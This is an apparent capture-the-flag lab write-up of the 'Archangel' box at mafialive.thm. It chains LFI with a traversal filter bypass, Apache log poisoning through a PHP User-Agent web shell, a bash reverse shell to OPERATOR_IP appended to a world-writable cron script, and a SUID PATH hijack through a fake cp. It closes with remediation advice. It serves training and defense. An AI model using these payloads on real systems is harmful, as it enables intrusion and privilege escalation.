LFI log poison, writable cron, and SUID PATH hijack
Foundations Linux engagement: mafialive.thm LFI with filter bypass enabled Apache log poisoning to RCE; world-writable cron pivoted to archangel; SUID backup resolved cp from PATH for root.
- Case files
- LFI log poison, writable cron, and SUID PATH hijack
Vhost discovery and LFI filter bypass led to log-poison RCE. A writable minute cron moved to archangel; PATH hijack of a SUID backup binary completed root.
Filter bypass included access.log; poisoned User-Agent executed commands as www-data.
Appended a reverse shell to /opt/helloworld.sh; cron executed as archangel.
Fake cp in PATH intercepted by SUID backup produced a root shell.
Engagement summary
Vhost discovery and LFI filter bypass led to log-poison RCE. A writable minute cron moved to archangel; PATH hijack of a SUID backup binary completed root.
ARCHANGEL required hosts entry for mafialive.thm. test.php?view= enforced a development_testing path prefix while blocking literal ../.. — .././ traversal still included /var/log/apache2/access.log. Poisoning User-Agent with PHP and re-including the log yielded www-data. /opt/helloworld.sh ran every minute as archangel and was world-writable; appending a reverse shell pivoted. SUID /home/archangel/secret/backup invoked relative cp; planting cp in PATH spawned root.
Business impact
LFI into logs is remote code execution. World-writable cron is horizontal privilege escalation. SUID helpers that shell out to PATH-resolved tools are root. Fix include filters with realpath allowlists, lock cron scripts, and use absolute paths in SUID binaries.
Vhost LFI and log poison RCE
Filter bypass included access.log; poisoned User-Agent executed commands as www-data.
OPERATOR · LFI
savvy@lab:~$ echo '<IP> mafialive.thm' | sudo tee -a /etc/hosts
savvy@lab:~$ curl -s 'http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log'
savvy@lab:~$ curl -A '<?php system($_GET["cmd"]); ?>' http://mafialive.thm/
savvy@lab:~$ curl -s 'http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=id'
uid=33(www-data) gid=33(www-data)
savvy@lab:~$ nc -lvnp 4444
savvy@lab:/var/www$
Writable cron to archangel
Appended a reverse shell to /opt/helloworld.sh; cron executed as archangel.
OPERATOR · CRON
savvy@lab:~$ cat /etc/crontab
*/1 * * * * archangel /opt/helloworld.sh
savvy@lab:~$ ls -la /opt/helloworld.sh
-rwxrwxrwx ... helloworld.sh
savvy@lab:~$ echo 'bash -i >& /dev/tcp/OPERATOR_IP/4445 0>&1' >> /opt/helloworld.sh
savvy@lab:~$ nc -lvnp 4445
savvy@lab:/home/archangel$
SUID backup PATH hijack
Fake cp in PATH intercepted by SUID backup produced a root shell.
OPERATOR · ROOT
savvy@lab:~$ ls -la /home/archangel/secret/backup
-rwsr-xr-x ... backup # calls relative cp
savvy@lab:~$ printf '#!/bin/bash\n/bin/bash\n' > /home/archangel/secret/cp && chmod +x cp
savvy@lab:~$ export PATH=/home/archangel/secret:$PATH && ./backup
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Resolve includes with realpath against an allowlist. Make cron scripts non-writable. Compile SUID helpers with absolute binary paths or remove the setuid bit.